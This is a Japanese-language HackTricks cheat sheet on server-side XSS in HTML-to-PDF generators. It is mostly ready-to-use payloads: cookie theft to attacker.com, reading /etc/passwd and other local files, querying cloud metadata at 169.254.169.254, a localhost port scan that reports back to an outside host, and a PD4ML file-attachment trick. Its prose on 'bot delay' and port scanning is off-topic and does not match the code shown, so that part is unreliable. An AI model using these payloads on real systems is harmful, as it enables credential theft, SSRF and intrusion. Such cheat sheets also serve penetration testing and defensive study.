15 KiB
サーバーサイドXSS(動的PDF)
☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥
- サイバーセキュリティ会社で働いていますか? HackTricksで会社を宣伝したいですか?または、PEASSの最新バージョンにアクセスしたり、HackTricksをPDFでダウンロードしたいですか?SUBSCRIPTION PLANSをチェックしてください!
- The PEASS Familyを見つけてください。独占的なNFTのコレクションです。
- 公式のPEASS&HackTricksのグッズを手に入れましょう。
- 💬 Discordグループまたはtelegramグループに参加するか、Twitterでフォローしてください🐦@carlospolopm。
- ハッキングのトリックを共有するには、PRを hacktricks repo と hacktricks-cloud repo に提出してください。
サーバーサイドXSS(動的PDF)
ウェブページがユーザーが制御する入力を使用してPDFを作成している場合、PDFを作成しているボットをだますことで、任意のJSコードを実行させることができます。
したがって、PDF作成ボットがいくつかの種類のHTML タグを見つけると、それらを解釈し、これを悪用してサーバーXSSを引き起こすことができます。
<script></script> タグは常に機能しないことに注意してください。そのため、JSを実行するためには別の方法が必要です(たとえば、<img を悪用する)。
また、通常の攻撃では作成されたPDFを表示/ダウンロードすることができるため、JSを使用して書いたものをすべて見ることができます(たとえば、document.write() を使用)。ただし、作成されたPDFを表示できない場合は、おそらくWebリクエストを行って情報を抽出する必要があります(ブラインド)。
人気のあるPDF生成方法
- wkhtmltopdf:これは、HTMLとCSSをPDFドキュメントに変換するためにWebKitレンダリングエンジンを使用するオープンソースのコマンドラインツールです。
- TCPDF:画像、グラフィック、暗号化など、さまざまな機能をサポートするPDFドキュメントを生成するためのPHPライブラリです。
- PDFKit:HTMLとCSSからPDFドキュメントを生成するために使用できるNode.jsライブラリです。
- iText:デジタル署名やフォーム入力などの機能をサポートする、JavaベースのPDFドキュメント生成用のライブラリです。
- FPDF:軽量で使いやすいPHPライブラリで、PDFドキュメントを生成するために使用されます。
ペイロード
ディスカバリー
<!-- Basic discovery, Write somthing-->
<img src="x" onerror="document.write('test')" />
<script>document.write(JSON.stringify(window.location))</script>
<script>document.write('<iframe src="'+window.location.href+'"></iframe>')</script>
<!--Basic blind discovery, load a resource-->
<img src="http://attacker.com"/>
<img src=x onerror="location.href='http://attacker.com/?c='+ document.cookie">
<script>new Image().src="http://attacker.com/?c="+encodeURI(document.cookie);</script>
<link rel=attachment href="http://attacker.com">
SVG
次のいずれかのペイロードをこのSVGペイロード内で使用することができます。Burpcollabサブドメインにアクセスするiframeと、メタデータエンドポイントにアクセスする別のiframeが例として挙げられています。
<svg xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1" class="root" width="800" height="500">
<g>
<foreignObject width="800" height="500">
<body xmlns="http://www.w3.org/1999/xhtml">
<iframe src="http://redacted.burpcollaborator.net" width="800" height="500"></iframe>
<iframe src="http://169.254.169.254/latest/meta-data/" width="800" height="500"></iframe>
</body>
</foreignObject>
</g>
</svg>
<svg width="100%" height="100%" viewBox="0 0 100 100"
xmlns="http://www.w3.org/2000/svg">
<circle cx="50" cy="50" r="45" fill="green"
id="foo"/>
<script type="text/javascript">
// <![CDATA[
alert(1);
// ]]>
</script>
</svg>
他のSVGペイロードについては、https://github.com/allanlw/svg-cheatsheetで多くの情報を見つけることができます。
パスの開示
<!-- If the bot is accessing a file:// path, you will discover the internal path
if not, you will at least have wich path the bot is accessing -->
<img src="x" onerror="document.write(window.location)" />
<script> document.write(window.location) </script>
外部スクリプトの読み込み
この脆弱性を悪用する最も適切な方法は、ボットがローカルで制御可能なスクリプトを読み込むように脆弱性を悪用することです。その後、ローカルでペイロードを変更し、同じコードでボットに読み込ませることができます。
<script src="http://attacker.com/myscripts.js"></script>
<img src="xasdasdasd" onerror="document.write('<script src="https://attacker.com/test.js"></script>')"/>
ローカルファイルの読み取り / SSRF
{% hint style="warning" %}
file:///etc/passwd を http://169.254.169.254/latest/user-data などの外部ウェブページにアクセスするために変更してみてください(SSRF)。
もしSSRFが許可されているが、興味深いドメインやIPに到達できない場合は、このページをチェックしてバイパスの可能性を確認してください。 {% endhint %}
<script>
x=new XMLHttpRequest;
x.onload=function(){document.write(btoa(this.responseText))};
x.open("GET","file:///etc/passwd");x.send();
</script>
<script>
xhzeem = new XMLHttpRequest();
xhzeem.onload = function(){document.write(this.responseText);}
xhzeem.onerror = function(){document.write('failed!')}
xhzeem.open("GET","file:///etc/passwd");
xhzeem.send();
</script>
<iframe src=file:///etc/passwd></iframe>
<img src="xasdasdasd" onerror="document.write('<iframe src=file:///etc/passwd></iframe>')"/>
<link rel=attachment href="file:///root/secret.txt">
<object data="file:///etc/passwd">
<portal src="file:///etc/passwd" id=portal>
<embed src="file:///etc/passwd>" width="400" height="400">
<style><iframe src="file:///etc/passwd">
<img src='x' onerror='document.write('<iframe src=file:///etc/passwd></iframe>')'/>&text=&width=500&height=500
<meta http-equiv="refresh" content="0;url=file:///etc/passwd" />
<annotation file="/etc/passwd" content="/etc/passwd" icon="Graph" title="Attached File: /etc/passwd" pos-x="195" />
ボットの遅延
Botの遅延は、Webアプリケーションのセキュリティをテストする際に重要な要素です。ボットは、自動化された攻撃を実行するために使用されるため、適切な遅延を設定することが重要です。遅延を設定することで、攻撃が検出されるリスクを減らし、アプリケーションの正常な動作を維持することができます。
ボットの遅延を設定するためには、以下の手順に従ってください。
-
リクエストの間隔をランダム化する:攻撃者がボットを検出しにくくするために、リクエストの間隔をランダムに設定します。これにより、攻撃が自動化されたものとして特定されるリスクが低くなります。
-
ユーザーエージェントの偽装:ボットが正当なユーザーとして認識されるようにするために、ユーザーエージェントを偽装します。これにより、攻撃が検出されるリスクが低くなります。
-
リクエストの順序を変更する:攻撃者が特定のパターンを検出しにくくするために、リクエストの順序をランダムに変更します。これにより、攻撃が予測されるリスクが低くなります。
ボットの遅延を設定することで、攻撃の検出リスクを低減し、セキュリティテストの効果を最大化することができます。
<!--Make the bot send a ping every 500ms to check how long does the bot wait-->
<script>
let time = 500;
setInterval(()=>{
let img = document.createElement("img");
img.src = `https://attacker.com/ping?time=${time}ms`;
time += 500;
}, 500);
</script>
<img src="https://attacker.com/delay">
ポートスキャン
ポートスキャンは、セキュリティテストの一環として使用されるネットワークスキャンの手法です。ポートスキャンは、特定のネットワーク上のホストに対して、開いているポートを特定するために使用されます。これにより、攻撃者はネットワーク上の脆弱性を特定し、潜在的な攻撃経路を見つけることができます。
ポートスキャンは、さまざまな方法で実行することができます。最も一般的な方法は、TCPポートスキャンです。攻撃者は、特定のポートにTCP接続を試み、接続が成功するかどうかを確認します。成功した接続は、開いているポートを示し、攻撃者はそのポートを標的として攻撃を試みることができます。
ポートスキャンは、セキュリティ上の脆弱性を特定するために使用される一方で、悪意のある攻撃にも使用されることがあります。したがって、正当な目的でのみ使用することが重要です。また、ポートスキャンは、ネットワークの所有者の許可を得て実行する必要があります。
<!--Scan local port and receive a ping indicating which ones are found-->
<script>
const checkPort = (port) => {
fetch(`http://localhost:${port}`, { mode: "no-cors" }).then(() => {
let img = document.createElement("img");
img.src = `http://attacker.com/ping?port=${port}`;
});
}
for(let i=0; i<1000; i++) {
checkPort(i);
}
</script>
<img src="https://attacker.com/startingScan">
SSRF
この脆弱性は非常に簡単にSSRFに変換できます(スクリプトが外部リソースを読み込むことができるため)。そのため、単にそれを悪用してみてください(メタデータを読み取るなど)。
添付ファイル:PD4ML
PD4MLのようないくつかのHTML 2 PDFエンジンでは、PDFに添付ファイルを指定することができます。この機能を悪用して、PDFに任意のローカルファイルを添付することができます。
添付ファイルを開くために、ファイルをFirefoxで開き、ペーパークリップのシンボルをダブルクリックして添付ファイルを新しいファイルとして保存しました。
BurpでPDFのレスポンスをキャプチャすると、PDF内の添付ファイルがクリアテキストで表示されます。
{% code overflow="wrap" %}
<!-- From https://0xdf.gitlab.io/2021/04/24/htb-bucket.html -->
<html><pd4ml:attachment src="/etc/passwd" description="attachment sample" icon="Paperclip"/></html>
{% endcode %}
参考文献
- https://lbherrera.github.io/lab/h1415-ctf-writeup.html
- https://buer.haus/2017/06/29/escalating-xss-in-phantomjs-image-rendering-to-ssrflocal-file-read/
- https://www.noob.ninja/2017/11/local-file-read-via-xss-in-dynamically.html
- https://infosecwriteups.com/breaking-down-ssrf-on-pdf-generation-a-pentesting-guide-66f8a309bf3c
☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥
- サイバーセキュリティ企業で働いていますか? HackTricksで会社を宣伝したいですか?または、PEASSの最新バージョンにアクセスしたり、HackTricksをPDFでダウンロードしたいですか?SUBSCRIPTION PLANSをチェックしてください!
- The PEASS Familyを発見しましょう。独占的なNFTのコレクションです。
- 公式のPEASS&HackTricksのグッズを手に入れましょう。
- 💬 Discordグループまたはtelegramグループに参加するか、Twitterでフォローしてください🐦@carlospolopm。
- ハッキングのトリックを共有するには、PRを hacktricks repo と hacktricks-cloud repo に提出してください。